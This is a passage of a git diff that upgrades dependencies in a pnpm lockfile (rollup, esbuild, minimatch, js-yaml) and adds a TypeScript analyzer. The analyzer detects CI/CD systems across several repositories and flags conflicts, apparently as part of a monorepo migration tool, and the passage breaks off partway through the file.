sha512-yTRONe79E+o0FWFijasoTjtzG9EBedFXJMl888NBEDCDV9I2wGbFFfJQQe63OijbFCUZqxpHz1GzpbtSFikJ4Q==} cpu: [loong64] os: [linux] libc: [musl] - '@rollup/rollup-linux-ppc64-gnu@4.57.1': - resolution: {integrity: sha512-4BrCgrpZo4hvzMDKRqEaW1zeecScDCR+2nZ86ATLhAoJ5FQ+lbHVD3ttKe74/c7tNT9c6F2viwB3ufwp01Oh2w==} + '@rollup/rollup-linux-ppc64-gnu@4.59.0': + resolution: {integrity: sha512-sw1o3tfyk12k3OEpRddF68a1unZ5VCN7zoTNtSn2KndUE+ea3m3ROOKRCZxEpmT9nsGnogpFP9x6mnLTCaoLkA==} cpu: [ppc64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-ppc64-musl@4.57.1': - resolution: {integrity: sha512-NOlUuzesGauESAyEYFSe3QTUguL+lvrN1HtwEEsU2rOwdUDeTMJdO5dUYl/2hKf9jWydJrO9OL/XSSf65R5+Xw==} + '@rollup/rollup-linux-ppc64-musl@4.59.0': + resolution: {integrity: 
sha512-+2kLtQ4xT3AiIxkzFVFXfsmlZiG5FXYW7ZyIIvGA7Bdeuh9Z0aN4hVyXS/G1E9bTP/vqszNIN/pUKCk/BTHsKA==} cpu: [ppc64] os: [linux] libc: [musl] - '@rollup/rollup-linux-riscv64-gnu@4.57.1': - resolution: {integrity: sha512-ptA88htVp0AwUUqhVghwDIKlvJMD/fmL/wrQj99PRHFRAG6Z5nbWoWG4o81Nt9FT+IuqUQi+L31ZKAFeJ5Is+A==} + '@rollup/rollup-linux-riscv64-gnu@4.59.0': + resolution: {integrity: sha512-NDYMpsXYJJaj+I7UdwIuHHNxXZ/b/N2hR15NyH3m2qAtb/hHPA4g4SuuvrdxetTdndfj9b1WOmy73kcPRoERUg==} cpu: [riscv64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-riscv64-musl@4.57.1': - resolution: {integrity: sha512-S51t7aMMTNdmAMPpBg7OOsTdn4tySRQvklmL3RpDRyknk87+Sp3xaumlatU+ppQ+5raY7sSTcC2beGgvhENfuw==} + '@rollup/rollup-linux-riscv64-musl@4.59.0': + resolution: {integrity: sha512-nLckB8WOqHIf1bhymk+oHxvM9D3tyPndZH8i8+35p/1YiVoVswPid2yLzgX7ZJP0KQvnkhM4H6QZ5m0LzbyIAg==} cpu: [riscv64] os: [linux] libc: [musl] - '@rollup/rollup-linux-s390x-gnu@4.57.1': - resolution: {integrity: sha512-Bl00OFnVFkL82FHbEqy3k5CUCKH6OEJL54KCyx2oqsmZnFTR8IoNqBF+mjQVcRCT5sB6yOvK8A37LNm/kPJiZg==} + '@rollup/rollup-linux-s390x-gnu@4.59.0': + resolution: {integrity: sha512-oF87Ie3uAIvORFBpwnCvUzdeYUqi2wY6jRFWJAy1qus/udHFYIkplYRW+wo+GRUP4sKzYdmE1Y3+rY5Gc4ZO+w==} cpu: [s390x] os: [linux] libc: [glibc] - '@rollup/rollup-linux-x64-gnu@4.57.1': - resolution: {integrity: sha512-ABca4ceT4N+Tv/GtotnWAeXZUZuM/9AQyCyKYyKnpk4yoA7QIAuBt6Hkgpw8kActYlew2mvckXkvx0FfoInnLg==} + '@rollup/rollup-linux-x64-gnu@4.59.0': + resolution: {integrity: sha512-3AHmtQq/ppNuUspKAlvA8HtLybkDflkMuLK4DPo77DfthRb71V84/c4MlWJXixZz4uruIH4uaa07IqoAkG64fg==} cpu: [x64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-x64-musl@4.57.1': - resolution: {integrity: sha512-HFps0JeGtuOR2convgRRkHCekD7j+gdAuXM+/i6kGzQtFhlCtQkpwtNzkNj6QhCDp7DRJ7+qC/1Vg2jt5iSOFw==} + '@rollup/rollup-linux-x64-musl@4.59.0': + resolution: {integrity: sha512-2UdiwS/9cTAx7qIUZB/fWtToJwvt0Vbo0zmnYt7ED35KPg13Q0ym1g442THLC7VyI6JfYTP4PiSOWyoMdV2/xg==} cpu: [x64] os: [linux] libc: [musl] - 
'@rollup/rollup-openbsd-x64@4.57.1': - resolution: {integrity: sha512-H+hXEv9gdVQuDTgnqD+SQffoWoc0Of59AStSzTEj/feWTBAnSfSD3+Dql1ZruJQxmykT/JVY0dE8Ka7z0DH1hw==} + '@rollup/rollup-openbsd-x64@4.59.0': + resolution: {integrity: sha512-M3bLRAVk6GOwFlPTIxVBSYKUaqfLrn8l0psKinkCFxl4lQvOSz8ZrKDz2gxcBwHFpci0B6rttydI4IpS4IS/jQ==} cpu: [x64] os: [openbsd] - '@rollup/rollup-openharmony-arm64@4.57.1': - resolution: {integrity: sha512-4wYoDpNg6o/oPximyc/NG+mYUejZrCU2q+2w6YZqrAs2UcNUChIZXjtafAiiZSUc7On8v5NyNj34Kzj/Ltk6dQ==} + '@rollup/rollup-openharmony-arm64@4.59.0': + resolution: {integrity: sha512-tt9KBJqaqp5i5HUZzoafHZX8b5Q2Fe7UjYERADll83O4fGqJ49O1FsL6LpdzVFQcpwvnyd0i+K/VSwu/o/nWlA==} cpu: [arm64] os: [openharmony] - '@rollup/rollup-win32-arm64-msvc@4.57.1': - resolution: {integrity: sha512-O54mtsV/6LW3P8qdTcamQmuC990HDfR71lo44oZMZlXU4tzLrbvTii87Ni9opq60ds0YzuAlEr/GNwuNluZyMQ==} + '@rollup/rollup-win32-arm64-msvc@4.59.0': + resolution: {integrity: sha512-V5B6mG7OrGTwnxaNUzZTDTjDS7F75PO1ae6MJYdiMu60sq0CqN5CVeVsbhPxalupvTX8gXVSU9gq+Rx1/hvu6A==} cpu: [arm64] os: [win32] - '@rollup/rollup-win32-ia32-msvc@4.57.1': - resolution: {integrity: sha512-P3dLS+IerxCT/7D2q2FYcRdWRl22dNbrbBEtxdWhXrfIMPP9lQhb5h4Du04mdl5Woq05jVCDPCMF7Ub0NAjIew==} + '@rollup/rollup-win32-ia32-msvc@4.59.0': + resolution: {integrity: sha512-UKFMHPuM9R0iBegwzKF4y0C4J9u8C6MEJgFuXTBerMk7EJ92GFVFYBfOZaSGLu6COf7FxpQNqhNS4c4icUPqxA==} cpu: [ia32] os: [win32] - '@rollup/rollup-win32-x64-gnu@4.57.1': - resolution: {integrity: sha512-VMBH2eOOaKGtIJYleXsi2B8CPVADrh+TyNxJ4mWPnKfLB/DBUmzW+5m1xUrcwWoMfSLagIRpjUFeW5CO5hyciQ==} + '@rollup/rollup-win32-x64-gnu@4.59.0': + resolution: {integrity: sha512-laBkYlSS1n2L8fSo1thDNGrCTQMmxjYY5G0WFWjFFYZkKPjsMBsgJfGf4TLxXrF6RyhI60L8TMOjBMvXiTcxeA==} cpu: [x64] os: [win32] - '@rollup/rollup-win32-x64-msvc@4.57.1': - resolution: {integrity: sha512-mxRFDdHIWRxg3UfIIAwCm6NzvxG0jDX/wBN6KsQFTvKFqqg9vTrWUE68qEjHt19A5wwx5X5aUi2zuZT7YR0jrA==} + '@rollup/rollup-win32-x64-msvc@4.59.0': + 
resolution: {integrity: sha512-2HRCml6OztYXyJXAvdDXPKcawukWY2GpR5/nxKp4iBgiO3wcoEGkAaqctIbZcNB6KlUQBIqt8VYkNSj2397EfA==} cpu: [x64] os: [win32] @@ -715,6 +594,9 @@ packages: '@types/http-errors@2.0.5': resolution: {integrity: sha512-r8Tayk8HJnX0FztbZN7oVqGccWgw98T/0neJphO91KkmOzug1KkofZURD4UaD5uH8AqcFLfdPErnBod0u71/qg==} + '@types/js-yaml@4.0.9': + resolution: {integrity: sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==} + '@types/jsonfile@6.1.4': resolution: {integrity: sha512-D5qGUYwjvnNNextdU59/+fI+spnwtTFmyQP0h+PfIOSkNfpU6AOICUOkm4i0OnSk+NyjdPJrxCDro0sJsWlRpQ==} @@ -730,6 +612,9 @@ packages: '@types/range-parser@1.2.7': resolution: {integrity: sha512-hKormJbkJqzQGhziax5PItDUTMAM9uE2XXQmM37dyd4hVM+5aVl7oVxMVUiVQn2oCQFN/LKCZdvSM0pFRqbSmQ==} + '@types/semver@7.7.1': + resolution: {integrity: sha512-FmgJfu+MOcQ370SD0ev7EI8TlCAfKYU+B4m5T3yXc1CiRN94g/SZPtsCkk506aUDtlMnFZvasDwHHUcZUEaYuA==} + '@types/send@1.2.1': resolution: {integrity: sha512-arsCikDvlU99zl1g69TcAB3mzZPpxgw0UQnaHeC1Nwb015xp8bknZv5rIfri9xTOcMuaVgvabfIRA7PSZVuZIQ==} @@ -811,6 +696,9 @@ packages: any-promise@1.3.0: resolution: {integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==} + argparse@2.0.1: + resolution: {integrity: sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==} + asap@2.0.6: resolution: {integrity: sha512-BSHWgDSAiKs50o2Re8ppvp3seVHXSRM44cdSsT9FfNEUUZLOGWVCsiWaRPWM1Znn+mqZ1OfVZ3z3DWEzSp7hRA==} @@ -821,21 +709,23 @@ packages: asynckit@0.4.0: resolution: {integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==} - balanced-match@1.0.2: - resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==} + balanced-match@4.0.4: + resolution: {integrity: 
sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==} + engines: {node: 18 || 20 || >=22} body-parser@2.2.2: resolution: {integrity: sha512-oP5VkATKlNwcgvxi0vM0p/D3n2C3EReYVX+DNYs5TjZFn/oQt2j+4sVJtSMr18pdRr8wjTcBl6LoV+FUwzPmNA==} engines: {node: '>=18'} - brace-expansion@2.0.2: - resolution: {integrity: sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==} + brace-expansion@5.0.4: + resolution: {integrity: sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==} + engines: {node: 18 || 20 || >=22} bundle-require@5.1.0: resolution: {integrity: sha512-3WrrOuZiyaaZPWiEt4G3+IffISVC9HYlWueJEBWED4ZH4aIAC2PnkdnuRrR94M+w6yGWn4AglWtJtBI8YqvgoA==} engines: {node: ^12.20.0 || ^14.13.1 || >=16.0.0} peerDependencies: - esbuild: '>=0.18' + esbuild: '>=0.25.0' bytes@3.1.2: resolution: {integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==} @@ -991,11 +881,6 @@ packages: resolution: {integrity: sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==} engines: {node: '>= 0.4'} - esbuild@0.21.5: - resolution: {integrity: sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==} - engines: {node: '>=12'} - hasBin: true - esbuild@0.27.2: resolution: {integrity: sha512-HyNQImnsOC7X9PMNaCIeAm4ISCQXs5a5YasTXVliKv4uuBo1dKrG0A+uQS8M5eXjVMnLg3WgXaKvprHlFJQffw==} engines: {node: '>=18'} @@ -1157,6 +1042,10 @@ packages: resolution: {integrity: sha512-34wB/Y7MW7bzjKRjUKTa46I2Z7eV62Rkhva+KkopW7Qvv/OSWBqvkSY7vusOPrNuZcUG3tApvdVgNB8POj3SPw==} engines: {node: '>=10'} + js-yaml@4.1.1: + resolution: {integrity: sha512-qQKT4zQxXl8lLwBtHMWwaTcGfFOZviOJet3Oy/xmGk2gZH677CJM9EvtfdSkgWcATZhj/55JZ0rmy3myCT5lsA==} + hasBin: true + jsonfile@6.2.0: resolution: {integrity: 
sha512-FGuPw30AdOIUTRMC2OMRtQV+jkVj2cfPqSeWXv1NEAJ1qZ5zb1X6z1mFhbfOB/iy3ssJCD+3KuZ8r8C3uVFlAg==} @@ -1224,9 +1113,9 @@ packages: engines: {node: '>=4.0.0'} hasBin: true - minimatch@9.0.5: - resolution: {integrity: sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==} - engines: {node: '>=16 || 14 >=14.17'} + minimatch@10.2.4: + resolution: {integrity: sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==} + engines: {node: 18 || 20 || >=22} minipass@7.1.2: resolution: {integrity: sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==} @@ -1357,8 +1246,8 @@ packages: resolution: {integrity: sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==} engines: {node: '>=8'} - rollup@4.57.1: - resolution: {integrity: sha512-oQL6lgK3e2QZeQ7gcgIkS2YZPg5slw37hYufJ3edKlfQSGGm8ICoxswK15ntSzF/a8+h7ekRy7k7oWc3BQ7y8A==} + rollup@4.59.0: + resolution: {integrity: sha512-2oMpl67a3zCH9H79LeMcbDhXW/UmWG/y2zuqnF2jQq5uq9TbM9TVyXvA4+t+ne2IIkBdrLpAaRQAvo7YI/Yyeg==} engines: {node: '>=18.0.0', npm: '>=8.0.0'} hasBin: true @@ -1684,150 +1573,81 @@ snapshots: '@bcoe/v8-coverage@0.2.3': {} - '@esbuild/aix-ppc64@0.21.5': - optional: true - '@esbuild/aix-ppc64@0.27.2': optional: true - '@esbuild/android-arm64@0.21.5': - optional: true - '@esbuild/android-arm64@0.27.2': optional: true - '@esbuild/android-arm@0.21.5': - optional: true - '@esbuild/android-arm@0.27.2': optional: true - '@esbuild/android-x64@0.21.5': - optional: true - '@esbuild/android-x64@0.27.2': optional: true - '@esbuild/darwin-arm64@0.21.5': - optional: true - '@esbuild/darwin-arm64@0.27.2': optional: true - '@esbuild/darwin-x64@0.21.5': - optional: true - '@esbuild/darwin-x64@0.27.2': optional: true - '@esbuild/freebsd-arm64@0.21.5': - optional: true - '@esbuild/freebsd-arm64@0.27.2': optional: true - '@esbuild/freebsd-x64@0.21.5': - optional: true - 
'@esbuild/freebsd-x64@0.27.2': optional: true - '@esbuild/linux-arm64@0.21.5': - optional: true - '@esbuild/linux-arm64@0.27.2': optional: true - '@esbuild/linux-arm@0.21.5': - optional: true - '@esbuild/linux-arm@0.27.2': optional: true - '@esbuild/linux-ia32@0.21.5': - optional: true - '@esbuild/linux-ia32@0.27.2': optional: true - '@esbuild/linux-loong64@0.21.5': - optional: true - '@esbuild/linux-loong64@0.27.2': optional: true - '@esbuild/linux-mips64el@0.21.5': - optional: true - '@esbuild/linux-mips64el@0.27.2': optional: true - '@esbuild/linux-ppc64@0.21.5': - optional: true - '@esbuild/linux-ppc64@0.27.2': optional: true - '@esbuild/linux-riscv64@0.21.5': - optional: true - '@esbuild/linux-riscv64@0.27.2': optional: true - '@esbuild/linux-s390x@0.21.5': - optional: true - '@esbuild/linux-s390x@0.27.2': optional: true - '@esbuild/linux-x64@0.21.5': - optional: true - '@esbuild/linux-x64@0.27.2': optional: true '@esbuild/netbsd-arm64@0.27.2': optional: true - '@esbuild/netbsd-x64@0.21.5': - optional: true - '@esbuild/netbsd-x64@0.27.2': optional: true '@esbuild/openbsd-arm64@0.27.2': optional: true - '@esbuild/openbsd-x64@0.21.5': - optional: true - '@esbuild/openbsd-x64@0.27.2': optional: true '@esbuild/openharmony-arm64@0.27.2': optional: true - '@esbuild/sunos-x64@0.21.5': - optional: true - '@esbuild/sunos-x64@0.27.2': optional: true - '@esbuild/win32-arm64@0.21.5': - optional: true - '@esbuild/win32-arm64@0.27.2': optional: true - '@esbuild/win32-ia32@0.21.5': - optional: true - '@esbuild/win32-ia32@0.27.2': optional: true - '@esbuild/win32-x64@0.21.5': - optional: true - '@esbuild/win32-x64@0.27.2': optional: true @@ -1998,79 +1818,79 @@ snapshots: '@pkgjs/parseargs@0.11.0': optional: true - '@rollup/rollup-android-arm-eabi@4.57.1': + '@rollup/rollup-android-arm-eabi@4.59.0': optional: true - '@rollup/rollup-android-arm64@4.57.1': + '@rollup/rollup-android-arm64@4.59.0': optional: true - '@rollup/rollup-darwin-arm64@4.57.1': + 
'@rollup/rollup-darwin-arm64@4.59.0': optional: true - '@rollup/rollup-darwin-x64@4.57.1': + '@rollup/rollup-darwin-x64@4.59.0': optional: true - '@rollup/rollup-freebsd-arm64@4.57.1': + '@rollup/rollup-freebsd-arm64@4.59.0': optional: true - '@rollup/rollup-freebsd-x64@4.57.1': + '@rollup/rollup-freebsd-x64@4.59.0': optional: true - '@rollup/rollup-linux-arm-gnueabihf@4.57.1': + '@rollup/rollup-linux-arm-gnueabihf@4.59.0': optional: true - '@rollup/rollup-linux-arm-musleabihf@4.57.1': + '@rollup/rollup-linux-arm-musleabihf@4.59.0': optional: true - '@rollup/rollup-linux-arm64-gnu@4.57.1': + '@rollup/rollup-linux-arm64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-arm64-musl@4.57.1': + '@rollup/rollup-linux-arm64-musl@4.59.0': optional: true - '@rollup/rollup-linux-loong64-gnu@4.57.1': + '@rollup/rollup-linux-loong64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-loong64-musl@4.57.1': + '@rollup/rollup-linux-loong64-musl@4.59.0': optional: true - '@rollup/rollup-linux-ppc64-gnu@4.57.1': + '@rollup/rollup-linux-ppc64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-ppc64-musl@4.57.1': + '@rollup/rollup-linux-ppc64-musl@4.59.0': optional: true - '@rollup/rollup-linux-riscv64-gnu@4.57.1': + '@rollup/rollup-linux-riscv64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-riscv64-musl@4.57.1': + '@rollup/rollup-linux-riscv64-musl@4.59.0': optional: true - '@rollup/rollup-linux-s390x-gnu@4.57.1': + '@rollup/rollup-linux-s390x-gnu@4.59.0': optional: true - '@rollup/rollup-linux-x64-gnu@4.57.1': + '@rollup/rollup-linux-x64-gnu@4.59.0': optional: true - '@rollup/rollup-linux-x64-musl@4.57.1': + '@rollup/rollup-linux-x64-musl@4.59.0': optional: true - '@rollup/rollup-openbsd-x64@4.57.1': + '@rollup/rollup-openbsd-x64@4.59.0': optional: true - '@rollup/rollup-openharmony-arm64@4.57.1': + '@rollup/rollup-openharmony-arm64@4.59.0': optional: true - '@rollup/rollup-win32-arm64-msvc@4.57.1': + '@rollup/rollup-win32-arm64-msvc@4.59.0': optional: true - 
'@rollup/rollup-win32-ia32-msvc@4.57.1': + '@rollup/rollup-win32-ia32-msvc@4.59.0': optional: true - '@rollup/rollup-win32-x64-gnu@4.57.1': + '@rollup/rollup-win32-x64-gnu@4.59.0': optional: true - '@rollup/rollup-win32-x64-msvc@4.57.1': + '@rollup/rollup-win32-x64-msvc@4.59.0': optional: true '@types/body-parser@1.19.6': @@ -2106,6 +1926,8 @@ snapshots: '@types/http-errors@2.0.5': {} + '@types/js-yaml@4.0.9': {} + '@types/jsonfile@6.1.4': dependencies: '@types/node': 20.19.31 @@ -2120,6 +1942,8 @@ snapshots: '@types/range-parser@1.2.7': {} + '@types/semver@7.7.1': {} + '@types/send@1.2.1': dependencies: '@types/node': 20.19.31 @@ -2222,13 +2046,15 @@ snapshots: any-promise@1.3.0: {} + argparse@2.0.1: {} + asap@2.0.6: {} assertion-error@2.0.1: {} asynckit@0.4.0: {} - balanced-match@1.0.2: {} + balanced-match@4.0.4: {} body-parser@2.2.2: dependencies: @@ -2244,9 +2070,9 @@ snapshots: transitivePeerDependencies: - supports-color - brace-expansion@2.0.2: + brace-expansion@5.0.4: dependencies: - balanced-match: 1.0.2 + balanced-match: 4.0.4 bundle-require@5.1.0(esbuild@0.27.2): dependencies: @@ -2371,32 +2197,6 @@ snapshots: has-tostringtag: 1.0.2 hasown: 2.0.2 - esbuild@0.21.5: - optionalDependencies: - '@esbuild/aix-ppc64': 0.21.5 - '@esbuild/android-arm': 0.21.5 - '@esbuild/android-arm64': 0.21.5 - '@esbuild/android-x64': 0.21.5 - '@esbuild/darwin-arm64': 0.21.5 - '@esbuild/darwin-x64': 0.21.5 - '@esbuild/freebsd-arm64': 0.21.5 - '@esbuild/freebsd-x64': 0.21.5 - '@esbuild/linux-arm': 0.21.5 - '@esbuild/linux-arm64': 0.21.5 - '@esbuild/linux-ia32': 0.21.5 - '@esbuild/linux-loong64': 0.21.5 - '@esbuild/linux-mips64el': 0.21.5 - '@esbuild/linux-ppc64': 0.21.5 - '@esbuild/linux-riscv64': 0.21.5 - '@esbuild/linux-s390x': 0.21.5 - '@esbuild/linux-x64': 0.21.5 - '@esbuild/netbsd-x64': 0.21.5 - '@esbuild/openbsd-x64': 0.21.5 - '@esbuild/sunos-x64': 0.21.5 - '@esbuild/win32-arm64': 0.21.5 - '@esbuild/win32-ia32': 0.21.5 - '@esbuild/win32-x64': 0.21.5 - esbuild@0.27.2: 
optionalDependencies: '@esbuild/aix-ppc64': 0.27.2 @@ -2490,7 +2290,7 @@ snapshots: dependencies: magic-string: 0.30.21 mlly: 1.8.0 - rollup: 4.57.1 + rollup: 4.59.0 foreground-child@3.3.1: dependencies: @@ -2548,7 +2348,7 @@ snapshots: dependencies: foreground-child: 3.3.1 jackspeak: 3.4.3 - minimatch: 9.0.5 + minimatch: 10.2.4 minipass: 7.1.2 package-json-from-dist: 1.0.1 path-scurry: 1.11.1 @@ -2622,6 +2422,10 @@ snapshots: joycon@3.1.1: {} + js-yaml@4.1.1: + dependencies: + argparse: 2.0.1 + jsonfile@6.2.0: dependencies: universalify: 2.0.1 @@ -2674,9 +2478,9 @@ snapshots: mime@2.6.0: {} - minimatch@9.0.5: + minimatch@10.2.4: dependencies: - brace-expansion: 2.0.2 + brace-expansion: 5.0.4 minipass@7.1.2: {} @@ -2778,35 +2582,35 @@ snapshots: resolve-from@5.0.0: {} - rollup@4.57.1: + rollup@4.59.0: dependencies: '@types/estree': 1.0.8 optionalDependencies: - '@rollup/rollup-android-arm-eabi': 4.57.1 - '@rollup/rollup-android-arm64': 4.57.1 - '@rollup/rollup-darwin-arm64': 4.57.1 - '@rollup/rollup-darwin-x64': 4.57.1 - '@rollup/rollup-freebsd-arm64': 4.57.1 - '@rollup/rollup-freebsd-x64': 4.57.1 - '@rollup/rollup-linux-arm-gnueabihf': 4.57.1 - '@rollup/rollup-linux-arm-musleabihf': 4.57.1 - '@rollup/rollup-linux-arm64-gnu': 4.57.1 - '@rollup/rollup-linux-arm64-musl': 4.57.1 - '@rollup/rollup-linux-loong64-gnu': 4.57.1 - '@rollup/rollup-linux-loong64-musl': 4.57.1 - '@rollup/rollup-linux-ppc64-gnu': 4.57.1 - '@rollup/rollup-linux-ppc64-musl': 4.57.1 - '@rollup/rollup-linux-riscv64-gnu': 4.57.1 - '@rollup/rollup-linux-riscv64-musl': 4.57.1 - '@rollup/rollup-linux-s390x-gnu': 4.57.1 - '@rollup/rollup-linux-x64-gnu': 4.57.1 - '@rollup/rollup-linux-x64-musl': 4.57.1 - '@rollup/rollup-openbsd-x64': 4.57.1 - '@rollup/rollup-openharmony-arm64': 4.57.1 - '@rollup/rollup-win32-arm64-msvc': 4.57.1 - '@rollup/rollup-win32-ia32-msvc': 4.57.1 - '@rollup/rollup-win32-x64-gnu': 4.57.1 - '@rollup/rollup-win32-x64-msvc': 4.57.1 + '@rollup/rollup-android-arm-eabi': 4.59.0 + 
'@rollup/rollup-android-arm64': 4.59.0 + '@rollup/rollup-darwin-arm64': 4.59.0 + '@rollup/rollup-darwin-x64': 4.59.0 + '@rollup/rollup-freebsd-arm64': 4.59.0 + '@rollup/rollup-freebsd-x64': 4.59.0 + '@rollup/rollup-linux-arm-gnueabihf': 4.59.0 + '@rollup/rollup-linux-arm-musleabihf': 4.59.0 + '@rollup/rollup-linux-arm64-gnu': 4.59.0 + '@rollup/rollup-linux-arm64-musl': 4.59.0 + '@rollup/rollup-linux-loong64-gnu': 4.59.0 + '@rollup/rollup-linux-loong64-musl': 4.59.0 + '@rollup/rollup-linux-ppc64-gnu': 4.59.0 + '@rollup/rollup-linux-ppc64-musl': 4.59.0 + '@rollup/rollup-linux-riscv64-gnu': 4.59.0 + '@rollup/rollup-linux-riscv64-musl': 4.59.0 + '@rollup/rollup-linux-s390x-gnu': 4.59.0 + '@rollup/rollup-linux-x64-gnu': 4.59.0 + '@rollup/rollup-linux-x64-musl': 4.59.0 + '@rollup/rollup-openbsd-x64': 4.59.0 + '@rollup/rollup-openharmony-arm64': 4.59.0 + '@rollup/rollup-win32-arm64-msvc': 4.59.0 + '@rollup/rollup-win32-ia32-msvc': 4.59.0 + '@rollup/rollup-win32-x64-gnu': 4.59.0 + '@rollup/rollup-win32-x64-msvc': 4.59.0 fsevents: 2.3.3 router@2.2.0: @@ -2966,7 +2770,7 @@ snapshots: dependencies: '@istanbuljs/schema': 0.1.3 glob: 10.5.0 - minimatch: 9.0.5 + minimatch: 10.2.4 thenify-all@1.6.0: dependencies: @@ -3010,7 +2814,7 @@ snapshots: picocolors: 1.1.1 postcss-load-config: 6.0.1(postcss@8.5.6) resolve-from: 5.0.0 - rollup: 4.57.1 + rollup: 4.59.0 source-map: 0.7.6 sucrase: 3.35.1 tinyexec: 0.3.2 @@ -3063,9 +2867,9 @@ snapshots: vite@5.4.21(@types/node@20.19.31): dependencies: - esbuild: 0.21.5 + esbuild: 0.27.2 postcss: 8.5.6 - rollup: 4.57.1 + rollup: 4.59.0 optionalDependencies: '@types/node': 20.19.31 fsevents: 2.3.3 diff --git a/src/analyzers/ci.ts b/src/analyzers/ci.ts new file mode 100755 index 0000000..d31982f --- /dev/null +++ b/src/analyzers/ci.ts @@ -0,0 +1,113 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, listFiles } from '../utils/fs.js'; + +const CI_SYSTEMS: Array<{ + name: 
string; + indicators: string[]; +}> = [ + { name: 'GitHub Actions', indicators: ['.github/workflows'] }, + { name: 'CircleCI', indicators: ['.circleci/config.yml', '.circleci/config.yaml'] }, + { name: 'Travis CI', indicators: ['.travis.yml'] }, + { name: 'GitLab CI', indicators: ['.gitlab-ci.yml'] }, + { name: 'Jenkins', indicators: ['Jenkinsfile'] }, + { name: 'Azure Pipelines', indicators: ['azure-pipelines.yml'] }, +]; + +/** + * Analyze CI/CD systems across repositories. + * Detects CI platforms and flags conflicts. + */ +export async function analyzeCI( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const ciDetections: Array<{ repo: string; system: string; files: string[] }> = []; + + for (const repo of repoPaths) { + for (const ci of CI_SYSTEMS) { + for (const indicator of ci.indicators) { + const fullPath = path.join(repo.path, indicator); + if (await pathExists(fullPath)) { + // For directories like .github/workflows, list files + let files = [indicator]; + try { + const dirFiles = await listFiles(fullPath); + files = dirFiles.map((f) => path.join(indicator, f)); + } catch { + // Not a directory, use as-is + } + ciDetections.push({ repo: repo.name, system: ci.name, files }); + } + } + } + } + + // Report detected CI systems + const systemCounts = new Map(); + for (const d of ciDetections) { + if (!systemCounts.has(d.system)) systemCounts.set(d.system, []); + systemCounts.get(d.system)!.push(d.repo); + } + + if (systemCounts.size > 1) { + findings.push({ + id: 'ci-multiple-systems', + title: 'Multiple CI/CD systems detected', + severity: 'warn', + confidence: 'high', + evidence: [...systemCounts.entries()].map(([system, repos]) => ({ + path: repos.join(', '), + snippet: `${system}: ${repos.length} repos`, + })), + suggestedAction: 'Standardize on a single CI system for the monorepo. 
GitHub Actions is recommended for GitHub-hosted repos.', + }); + } + + // Check for workflow name conflicts (GitHub Actions specific) + const ghWorkflows = ciDetections.filter((d) => d.system === 'GitHub Actions'); + if (ghWorkflows.length > 1) { + const workflowNames = new Map(); + for (const wf of ghWorkflows) { + for (const file of wf.files) { + const name = path.basename(file); + if (!workflowNames.has(name)) workflowNames.set(name, []); + workflowNames.get(name)!.push(wf.repo); + } + } + + for (const [name, repos] of workflowNames) { + if (repos.length > 1) { + findings.push({ + id: `ci-workflow-conflict-${name}`, + title: `GitHub Actions workflow '${name}' exists in multiple repos`, + severity: 'warn', + confidence: 'high', + evidence: repos.map((r) => ({ + path: r, + snippet: `.github/workflows/${name}`, + })), + suggestedAction: 'Workflows will need to be merged or renamed during migration', + }); + } + } + } + + // Check for repos with no CI + const reposWithCI = new Set(ciDetections.map((d) => d.repo)); + const reposWithoutCI = repoPaths.filter((r) => !reposWithCI.has(r.name)); + if (reposWithoutCI.length > 0 && reposWithCI.size > 0) { + findings.push({ + id: 'ci-missing', + title: 'Some repositories have no CI configuration', + severity: 'info', + confidence: 'high', + evidence: reposWithoutCI.map((r) => ({ path: r.name })), 